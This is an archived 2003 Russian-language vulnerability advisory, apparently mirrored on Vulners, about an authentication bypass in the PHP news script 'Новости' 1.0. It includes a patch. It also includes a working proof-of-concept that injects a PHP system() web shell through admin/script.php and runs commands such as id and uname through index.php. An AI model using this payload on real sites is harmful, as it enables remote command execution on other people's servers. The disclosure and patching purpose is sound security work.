Search...

Новости

2003-03-31T00:00:00

ID SECURITYVULNS:DOC:4303
Type securityvulns
Reporter Securityvulns
Modified 2003-03-31T00:00:00

Description

Product: Новости Version: 1.0 OffSite: http://xonix.ru Problem: Добавление новостей

Можно добавлять новости без авторизации.

http://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.

Пример:

http://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?> затем открыть http://[target]/index.php?cmd=id;uname -a; etc...

Патч.

Добавьте в файл index.php строку: <input type=hidden name=pass value=<?=$pass?>> перед </form>

А в файл script.php добавьте после строки include("config.php"); if (!isset($pass)) exit; $q=strcmp($pass,$password);

greetz: GipsHack, DHGroup, subj, Lobst, and all, who know me

Contacts: www.overg.com www.dwcgr0up.com irc.zaingandol.org #DWC ogprog@ukr.net

Best regards, Over G[DWC Gr0up]

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:4303", "bulletinFamily": "software", "title": "\u041d\u043e\u0432\u043e\u0441\u0442\u0438", "description": "Product: \u041d\u043e\u0432\u043e\u0441\u0442\u0438\r\nVersion: 1.0\r\nOffSite: http://xonix.ru\r\nProblem: \u0414\u043e\u0431\u0430\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0435\u0439\r\n--------------------------------------\r\n\r\n\u041c\u043e\u0436\u043d\u043e \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u0442\u044c \u043d\u043e\u0432\u043e\u0441\u0442\u0438 \u0431\u0435\u0437 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438.\r\n\r\nhttp://[target]/admin/script.php?data=ENTER_THIS_YOUR_NEWS.\r\n\r\n\u041f\u0440\u0438\u043c\u0435\u0440:\r\n\r\nhttp://[target]/admin/script.php?data=script.php?data=<? system($cmd) ?>\r\n\u0437\u0430\u0442\u0435\u043c \u043e\u0442\u043a\u0440\u044b\u0442\u044c http://[target]/index.php?cmd=id;uname -a;\r\netc...\r\n\r\n\r\n\u041f\u0430\u0442\u0447.\r\n\r\n\u0414\u043e\u0431\u0430\u0432\u044c\u0442\u0435 \u0432 \u0444\u0430\u0439\u043b index.php \u0441\u0442\u0440\u043e\u043a\u0443: \r\n<input type=hidden name=pass value=<?=$pass?>> \u043f\u0435\u0440\u0435\u0434 </form> \r\n\r\n\u0410 \u0432 \u0444\u0430\u0439\u043b script.php \u0434\u043e\u0431\u0430\u0432\u044c\u0442\u0435 \u043f\u043e\u0441\u043b\u0435 \u0441\u0442\u0440\u043e\u043a\u0438 include("config.php");\r\nif (!isset($pass)) exit;\r\n$q=strcmp($pass,$password);\r\n\r\n\r\n\r\ngreetz: GipsHack, DHGroup, subj, Lobst, and all, who know me \r\n\r\nContacts: www.overg.com www.dwcgr0up.com\r\nirc.zaingandol.org #DWC\r\nogprog@ukr.net\r\n\r\n\r\nBest regards, Over G[DWC Gr0up]\r\n\r\n", "published": "2003-03-31T00:00:00", "modified": "2003-03-31T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:4303", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:07", "edition": 1, "viewCount": 5, "enchantments": {"score": {"value": 0.8, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:2699"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:2699"]}]}, "exploitation": null, "vulnersScore": 0.8}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645408541}}